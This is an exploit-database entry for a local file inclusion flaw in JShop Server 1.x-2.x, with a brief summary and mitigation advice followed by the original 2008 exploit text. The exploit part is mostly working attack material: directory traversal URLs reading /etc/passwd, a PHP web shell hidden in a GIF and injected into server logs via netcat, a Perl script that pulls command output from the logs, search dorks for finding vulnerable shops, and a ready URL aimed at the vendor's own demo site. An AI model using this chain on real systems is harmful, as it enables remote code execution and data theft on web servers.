JShop 1.x-2.x local file include

vendor:

JShop Server

by:

v0l4arrra

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: JShop Server

Affected Version From: 1.x

Affected Version To: 2.x

Patch Exists: NO

Related CWE: N/A

CPE: a:jshop:jshop_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

JShop 1.x-2.x local file include

JShop Server 1.x-2.x is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters to the vulnerable server. This can allow the attacker to read sensitive files on the server, such as /etc/passwd. An attacker can also upload a malicious file, such as a GIF file containing PHP code, to the vulnerable server. This can allow the attacker to execute arbitrary code on the server. A Perl script can be used to parse the output of the error log and print the results.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated. Input validation should be performed on both the client-side and server-side. Additionally, the web server should be configured to deny access to sensitive files and directories.

Source

Exploit-DB raw data:

JShop 1.x-2.x local file include
---------------------------------------------------------------------------------------------------------------------
+ scripts:	Jshop Server 1.x-2.x                                                                                +
+ Discovered By :	v0l4arrra <v0l4arrr[at]gmail[dot]com>                                                       +
+ url:	 www.jshop.co.uk                                                                                            +
+ dork:	"powered by jshop" and also usefull one "allinurl:jssCart=.."                                               +
---------------------------------------------------------------------------------------------------------------------
Go to www.jshop.co.uk and check out demo version...

http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../../../../etc/passwd%00

Then u can upload for example the gif file like this 

$cat 1.gif
GIF89aD
<?php echo system($_GET['cmd']); ?>

or do it like me:
$nc www.jshopecommerce.com 80
GET <?php echo '<start>'; echo system($_GET['cmd']); echo '</start>'; ?> HTTP/1.1
Host: www.jshopecommerce.com

................................................................................................................
and simple parse the output of error log with lame perl script:

#!/usr/bin/env perl
use strict; use warnings;

#####################################
# This script download log file     #
# and grep the result of the        #
# command in tags <start>..</start> #
# and print it..                    #
#####################################

use LWP::UserAgent;
use HTTP::Request::Common;

$| = 1;

my $url = $ARGV[0] or print "usage: $0 http://127.0.0.1/vuln.php?page=../../../../../var/log/access.log%00&cmd=ls+-lisa\n" and exit;
my $ua= new LWP::UserAgent;
$ua->agent("Mozilla/5.0");
my $request = new HTTP::Request( 'GET' => $url );
my $document = $ua->request($request);
my $response = $document->as_string;
$response =~ m%<start>(.*?)</start>%is;
print $1,"\n";

######################################

so dont waste your time and check it now
http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../../etc/httpd/logs/error_log%00&cmd=ls+-lisa

##########################################

# milw0rm.com [2008-03-30]